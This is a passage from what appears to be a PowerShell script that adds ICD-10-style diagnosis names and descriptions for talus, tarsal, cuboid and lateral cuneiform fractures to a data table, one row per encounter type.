talus","Nondisplaced fracture of posterior process of right talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior process of right talus","Nondisplaced fracture of posterior process of right talus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior process of left talus","Nondisplaced fracture of posterior process of left talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior process of left talus","Nondisplaced fracture of posterior process of left talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior process of left talus","Nondisplaced fracture of posterior process of left talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior process of left talus","Nondisplaced fracture of posterior process of left talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior process of left talus","Nondisplaced fracture of posterior process of left talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior process of left talus","Nondisplaced fracture of posterior process of left talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior process of left talus","Nondisplaced fracture of posterior process of left talus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior process of unspecified talus","Nondisplaced fracture of posterior process of unspecified talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior process of unspecified talus","Nondisplaced fracture of posterior process of unspecified talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior process of unspecified talus","Nondisplaced fracture of posterior process of unspecified talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior process of unspecified talus","Nondisplaced fracture of posterior process of unspecified talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior process of unspecified talus","Nondisplaced fracture of posterior process of unspecified talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior process of unspecified talus","Nondisplaced fracture of posterior process of unspecified talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior process of unspecified talus","Nondisplaced fracture of posterior process of unspecified talus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of right talus","Displaced dome fracture of right talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of right talus","Displaced dome fracture of right talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of right talus","Displaced dome fracture of right talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of right talus","Displaced dome fracture of right talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of right talus","Displaced dome fracture of right talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of right talus","Displaced dome fracture of right talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of right talus","Displaced dome fracture of right talus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of left talus","Displaced dome fracture of left talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of left talus","Displaced dome fracture of left talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of left talus","Displaced dome fracture of left talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of left talus","Displaced dome fracture of left talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of left talus","Displaced dome fracture of left talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of left talus","Displaced dome fracture of left talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of left talus","Displaced dome fracture of left talus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of unspecified talus","Displaced dome fracture of unspecified talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of unspecified talus","Displaced dome fracture of unspecified talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of unspecified talus","Displaced dome fracture of unspecified talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of unspecified talus","Displaced dome fracture of unspecified talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of unspecified talus","Displaced dome fracture of unspecified talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of unspecified talus","Displaced dome fracture of unspecified talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced dome fracture of unspecified talus","Displaced dome fracture of unspecified talus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of right talus","Nondisplaced dome fracture of right talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of right talus","Nondisplaced dome fracture of right talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of right talus","Nondisplaced dome fracture of right talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of right talus","Nondisplaced dome fracture of right talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of right talus","Nondisplaced dome fracture of right talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of right talus","Nondisplaced dome fracture of right talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of right talus","Nondisplaced dome fracture of right talus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of left talus","Nondisplaced dome fracture of left talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of left talus","Nondisplaced dome fracture of left talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of left talus","Nondisplaced dome fracture of left talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of left talus","Nondisplaced dome fracture of left talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of left talus","Nondisplaced dome fracture of left talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of left talus","Nondisplaced dome fracture of left talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of left talus","Nondisplaced dome fracture of left talus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of unspecified talus","Nondisplaced dome fracture of unspecified talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of unspecified talus","Nondisplaced dome fracture of unspecified talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of unspecified talus","Nondisplaced dome fracture of unspecified talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of unspecified talus","Nondisplaced dome fracture of unspecified talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of unspecified talus","Nondisplaced dome fracture of unspecified talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of unspecified talus","Nondisplaced dome fracture of unspecified talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced dome fracture of unspecified talus","Nondisplaced dome fracture of unspecified talus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture (chip fracture) of right talus","Displaced avulsion fracture (chip fracture) of right talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture (chip fracture) of right talus","Displaced avulsion fracture (chip fracture) of right talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture (chip fracture) of right talus","Displaced avulsion fracture (chip fracture) of right talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture (chip fracture) of right talus","Displaced avulsion fracture (chip fracture) of right talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture (chip fracture) of right talus","Displaced avulsion fracture (chip fracture) of right talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture (chip fracture) of right talus","Displaced avulsion fracture (chip fracture) of right talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture (chip fracture) of right talus","Displaced avulsion fracture (chip fracture) of right talus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture (chip fracture) of left talus","Displaced avulsion fracture (chip fracture) of left talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture (chip fracture) of left talus","Displaced avulsion fracture (chip fracture) of left talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture (chip fracture) of left talus","Displaced avulsion fracture (chip fracture) of left talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture (chip fracture) of left talus","Displaced avulsion fracture (chip fracture) of left talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture (chip fracture) of left talus","Displaced avulsion fracture (chip fracture) of left talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture (chip fracture) of left talus","Displaced avulsion fracture (chip fracture) of left talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture (chip fracture) of left talus","Displaced avulsion fracture (chip fracture) of left talus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture (chip fracture) of unspecified talus","Displaced avulsion fracture (chip fracture) of unspecified talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture (chip fracture) of unspecified talus","Displaced avulsion fracture (chip fracture) of unspecified talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture (chip fracture) of unspecified talus","Displaced avulsion fracture (chip fracture) of unspecified talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture (chip fracture) of unspecified talus","Displaced avulsion fracture (chip fracture) of unspecified talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture (chip fracture) of unspecified talus","Displaced avulsion fracture (chip fracture) of unspecified talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture (chip fracture) of unspecified talus","Displaced avulsion fracture (chip fracture) of unspecified talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced avulsion fracture (chip fracture) of unspecified talus","Displaced avulsion fracture (chip fracture) of unspecified talus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture (chip fracture) of right talus","Nondisplaced avulsion fracture (chip fracture) of right talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture (chip fracture) of right talus","Nondisplaced avulsion fracture (chip fracture) of right talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture (chip fracture) of right talus","Nondisplaced avulsion fracture (chip fracture) of right talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture (chip fracture) of right talus","Nondisplaced avulsion fracture (chip fracture) of right talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture (chip fracture) of right talus","Nondisplaced avulsion fracture (chip fracture) of right talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture (chip fracture) of right talus","Nondisplaced avulsion fracture (chip fracture) of right talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture (chip fracture) of right talus","Nondisplaced avulsion fracture (chip fracture) of right talus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture (chip fracture) of left talus","Nondisplaced avulsion fracture (chip fracture) of left talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture (chip fracture) of left talus","Nondisplaced avulsion fracture (chip fracture) of left talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture (chip fracture) of left talus","Nondisplaced avulsion fracture (chip fracture) of left talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture (chip fracture) of left talus","Nondisplaced avulsion fracture (chip fracture) of left talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture (chip fracture) of left talus","Nondisplaced avulsion fracture (chip fracture) of left talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture (chip fracture) of left talus","Nondisplaced avulsion fracture (chip fracture) of left talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture (chip fracture) of left talus","Nondisplaced avulsion fracture (chip fracture) of left talus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture (chip fracture) of unspecified talus","Nondisplaced avulsion fracture (chip fracture) of unspecified talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture (chip fracture) of unspecified talus","Nondisplaced avulsion fracture (chip fracture) of unspecified talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture (chip fracture) of unspecified talus","Nondisplaced avulsion fracture (chip fracture) of unspecified talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture (chip fracture) of unspecified talus","Nondisplaced avulsion fracture (chip fracture) of unspecified talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture (chip fracture) of unspecified talus","Nondisplaced avulsion fracture (chip fracture) of unspecified talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture (chip fracture) of unspecified talus","Nondisplaced avulsion fracture (chip fracture) of unspecified talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced avulsion fracture (chip fracture) of unspecified talus","Nondisplaced avulsion fracture (chip fracture) of unspecified talus, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of right talus","Other fracture of right talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of right talus","Other fracture of right talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of right talus","Other fracture of right talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right talus","Other fracture of right talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right talus","Other fracture of right talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right talus","Other fracture of right talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right talus","Other fracture of right talus, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of left talus","Other fracture of left talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of left talus","Other fracture of left talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of left talus","Other fracture of left talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left talus","Other fracture of left talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left talus","Other fracture of left talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left talus","Other fracture of left talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left talus","Other fracture of left talus, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified talus","Other fracture of unspecified talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified talus","Other fracture of unspecified talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified talus","Other fracture of unspecified talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified talus","Other fracture of unspecified talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified talus","Other fracture of unspecified talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified talus","Other fracture of unspecified talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified talus","Other fracture of unspecified talus, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified tarsal bone(s) of right foot","Fracture of unspecified tarsal bone(s) of right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified tarsal bone(s) of right foot","Fracture of unspecified tarsal bone(s) of right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified tarsal bone(s) of right foot","Fracture of unspecified tarsal bone(s) of right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified tarsal bone(s) of right foot","Fracture of unspecified tarsal bone(s) of right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified tarsal bone(s) of right foot","Fracture of unspecified tarsal bone(s) of right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified tarsal bone(s) of right foot","Fracture of unspecified tarsal bone(s) of right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified tarsal bone(s) of right foot","Fracture of unspecified tarsal bone(s) of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified tarsal bone(s) of left foot","Fracture of unspecified tarsal bone(s) of left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified tarsal bone(s) of left foot","Fracture of unspecified tarsal bone(s) of left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified tarsal bone(s) of left foot","Fracture of unspecified tarsal bone(s) of left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified tarsal bone(s) of left foot","Fracture of unspecified tarsal bone(s) of left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified tarsal bone(s) of left foot","Fracture of unspecified tarsal bone(s) of left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified tarsal bone(s) of left foot","Fracture of unspecified tarsal bone(s) of left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified tarsal bone(s) of left foot","Fracture of unspecified tarsal bone(s) of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified tarsal bone(s) of unspecified foot","Fracture of unspecified tarsal bone(s) of unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified tarsal bone(s) of unspecified foot","Fracture of unspecified tarsal bone(s) of unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified tarsal bone(s) of unspecified foot","Fracture of unspecified tarsal bone(s) of unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified tarsal bone(s) of unspecified foot","Fracture of unspecified tarsal bone(s) of unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified tarsal bone(s) of unspecified foot","Fracture of unspecified tarsal bone(s) of unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified tarsal bone(s) of unspecified foot","Fracture of unspecified tarsal bone(s) of unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified tarsal bone(s) of unspecified foot","Fracture of unspecified tarsal bone(s) of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of cuboid bone of right foot","Displaced fracture of cuboid bone of right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of cuboid bone of right foot","Displaced fracture of cuboid bone of right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of cuboid bone of right foot","Displaced fracture of cuboid bone of right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of cuboid bone of right foot","Displaced fracture of cuboid bone of right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of cuboid bone of right foot","Displaced fracture of cuboid bone of right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of cuboid bone of right foot","Displaced fracture of cuboid bone of right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of cuboid bone of right foot","Displaced fracture of cuboid bone of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of cuboid bone of left foot","Displaced fracture of cuboid bone of left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of cuboid bone of left foot","Displaced fracture of cuboid bone of left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of cuboid bone of left foot","Displaced fracture of cuboid bone of left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of cuboid bone of left foot","Displaced fracture of cuboid bone of left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of cuboid bone of left foot","Displaced fracture of cuboid bone of left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of cuboid bone of left foot","Displaced fracture of cuboid bone of left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of cuboid bone of left foot","Displaced fracture of cuboid bone of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of cuboid bone of unspecified foot","Displaced fracture of cuboid bone of unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of cuboid bone of unspecified foot","Displaced fracture of cuboid bone of unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of cuboid bone of unspecified foot","Displaced fracture of cuboid bone of unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of cuboid bone of unspecified foot","Displaced fracture of cuboid bone of unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of cuboid bone of unspecified foot","Displaced fracture of cuboid bone of unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of cuboid bone of unspecified foot","Displaced fracture of cuboid bone of unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of cuboid bone of unspecified foot","Displaced fracture of cuboid bone of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of cuboid bone of right foot","Nondisplaced fracture of cuboid bone of right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of cuboid bone of right foot","Nondisplaced fracture of cuboid bone of right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of cuboid bone of right foot","Nondisplaced fracture of cuboid bone of right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of cuboid bone of right foot","Nondisplaced fracture of cuboid bone of right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of cuboid bone of right foot","Nondisplaced fracture of cuboid bone of right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of cuboid bone of right foot","Nondisplaced fracture of cuboid bone of right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of cuboid bone of right foot","Nondisplaced fracture of cuboid bone of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of cuboid bone of left foot","Nondisplaced fracture of cuboid bone of left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of cuboid bone of left foot","Nondisplaced fracture of cuboid bone of left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of cuboid bone of left foot","Nondisplaced fracture of cuboid bone of left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of cuboid bone of left foot","Nondisplaced fracture of cuboid bone of left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of cuboid bone of left foot","Nondisplaced fracture of cuboid bone of left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of cuboid bone of left foot","Nondisplaced fracture of cuboid bone of left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of cuboid bone of left foot","Nondisplaced fracture of cuboid bone of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of cuboid bone of unspecified foot","Nondisplaced fracture of cuboid bone of unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of cuboid bone of unspecified foot","Nondisplaced fracture of cuboid bone of unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of cuboid bone of unspecified foot","Nondisplaced fracture of cuboid bone of unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of cuboid bone of unspecified foot","Nondisplaced fracture of cuboid bone of unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of cuboid bone of unspecified foot","Nondisplaced fracture of cuboid bone of unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of cuboid bone of unspecified foot","Nondisplaced fracture of cuboid bone of unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of cuboid bone of unspecified foot","Nondisplaced fracture of cuboid bone of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral cuneiform of right foot","Displaced fracture of lateral cuneiform of right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral cuneiform of right foot","Displaced fracture of lateral cuneiform of right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral cuneiform of right foot","Displaced fracture of lateral cuneiform of right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral cuneiform of right foot","Displaced fracture of lateral cuneiform of right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral cuneiform of right foot","Displaced fracture of lateral cuneiform of right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral cuneiform of right foot","Displaced fracture of lateral cuneiform of right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral cuneiform of right foot","Displaced fracture of lateral cuneiform of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral cuneiform of left foot","Displaced fracture of lateral cuneiform of left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral cuneiform of left foot","Displaced fracture of lateral cuneiform of left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral cuneiform of left foot","Displaced fracture of lateral cuneiform of left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral cuneiform of left foot","Displaced fracture of lateral cuneiform of left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral cuneiform of left foot","Displaced fracture of lateral cuneiform of left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral cuneiform of left foot","Displaced fracture of lateral cuneiform of left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral cuneiform of left foot","Displaced fracture of lateral cuneiform of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral cuneiform of unspecified foot","Displaced fracture of lateral cuneiform of unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral cuneiform of unspecified foot","Displaced fracture of lateral cuneiform of unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral cuneiform of unspecified foot","Displaced fracture of lateral cuneiform of unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral cuneiform of unspecified foot","Displaced fracture of lateral cuneiform of unspecified foot, subsequent encounter for 